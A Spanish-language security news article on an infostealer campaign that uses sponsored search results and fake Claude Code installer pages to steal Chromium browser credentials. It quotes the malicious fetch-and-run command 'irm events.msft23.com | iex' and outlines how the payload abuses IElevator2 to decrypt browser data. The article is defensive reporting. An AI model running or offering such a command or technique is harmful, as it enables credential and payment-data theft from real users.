Una campaña activa de robo de información secuestra a desarrolladores con instaladores falsos de Claude Code y otras herramientas de programación populares, según investigadores de seguridad de Ontinue. El cebo, como en otros ataques recientes de tipo infostealer dirigidos a devs, imita un instalador legítimo de una sola línea pero apunta a un comando bajo control del atacante.

El comando original es irm https://claude.ai/install.ps1 | iex. La versión maliciosa reemplaza el host de destino por irm events.msft23.com | iex. La diferencia visual mínima esconde un payload que no coincide con ninguna familia documentada de malware, pero que hace daño concreto: exfiltra cookies, contraseñas y métodos de pago descifrados desde navegadores basados en Chromium, incluyendo Google Chrome, Microsoft Edge, Brave, Vivaldi y Opera.

¿Cómo llegan los usuarios al instalador falso?

El ataque se apoya en una técnica antigua pero efectiva: resultados patrocinados en buscadores cuando un desarrollador escribe "install claude code". El clic en el aviso lleva a una página de aterrizaje que imita la de instalación de Anthropic. Esa página descarga y ejecuta el instalador auténtico, así que el usuario ve avanzar lo que cree es Claude Code. En paralelo, sin embargo, la instrucción maliciosa no vive en el archivo descargado sino que está renderizada en el HTML de la página.

Los investigadores explican el truco así: "Los escáneres automatizados, los servicios de reputación de URL y cualquier revisor escéptico que simplemente haga curl a la URL ven PowerShell limpio entregado desde un dominio fronteado por Cloudflare con un certificado válido de Let's Encrypt. Las víctimas, en cambio, reciben un comando completamente distinto".

La infraestructura corre sobre tres dominios registrados con seis días de diferencia en abril, todos detrás de Cloudflare.

¿Qué hace exactamente el payload?

El comando pegado redirige a la víctima a un loader de PowerShell ofuscado, que inyecta un helper nativo de App-Bound Encryption (ABE) dentro del proceso activo del navegador. El propósito exclusivo de ese helper es invocar la interfaz IElevator2 COM del navegador para recuperar la clave de App-Bound Encryption.

Google introdujo IElevator2 en enero como pieza del servicio de elevación de Chromium, justamente para proteger los datos sensibles del usuario (cookies, contraseñas) frente a las técnicas de bypass anteriores y los commodity stealers que copiaban directamente la base de datos SQLite donde residían esos datos. Pero atacantes (y también investigadores de seguridad) encontraron rápidamente cómo abusar de IElevator2.

El helper formatea una pipe siguiendo la convención de Mojo para IPC del propio Chromium, intenta descifrar con IElevator2 y, si falla, cae a la interfaz legacy del Elevation Service. Una vez obtenida la clave ABE, el loader de PowerShell descifra las bases de datos locales del navegador y envía la información robada a un servidor del atacante dentro de un archivo secure_prefs.zip armado en memoria.

¿De qué familia es?

Esta es la parte interesante para los equipos de detección. Ontinue comparó el malware contra los reportes públicos de más de 18 stealers conocidos (Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, Storm) y no encontró match técnico.

El más parecido es Glove Stealer, documentado por Gen Digital en noviembre de 2024, que también abusa de IElevator a través de un módulo helper que se comunica por named pipe. La diferencia clave está en el modelo de orquestación: la campaña nueva usa un "helper nativo pequeño que actúa como oráculo ABE de propósito único, con toda la actividad visible para detección empujada hacia la capa PowerShell".

¿Por qué importa para defensores?

Esta separación arquitectónica es lo que diferencia al ataque de un stealer tradicional. Los investigadores de Ontinue lo explican con precisión: "Conjuntos de reglas de comportamiento que miren el PE nativo en aislamiento no van a ver nada accionable. La detección tiene que aterrizar en la llamada COM y en la capa de PowerShell".

Para equipos de seguridad chilenos y de LatAm, hay tres acciones inmediatas:

  • Bloquear los dominios señalados por Ontinue (en particular events.msft23.com y los otros dos del registro coordinado de abril).
  • Auditar los EDR para asegurar que correlacionan eventos COM con actividad de PowerShell en tiempo cercano, no como capas independientes.
  • Capacitar a developers sobre el riesgo de seguir resultados patrocinados al buscar instaladores; pegar el comando directo desde la documentación oficial de Anthropic (claude.ai/install) es trivial y elimina el vector completo.

El uso de Claude Code como cebo no es accidental. La popularidad creciente de la herramienta entre desarrolladores la convierte en un objetivo de búsqueda recurrente, lo que vuelve a los atacantes rentables al comprar avisos patrocinados sobre la marca. Es probable que el mismo patrón se replique con instaladores falsos de otras herramientas de programación de moda.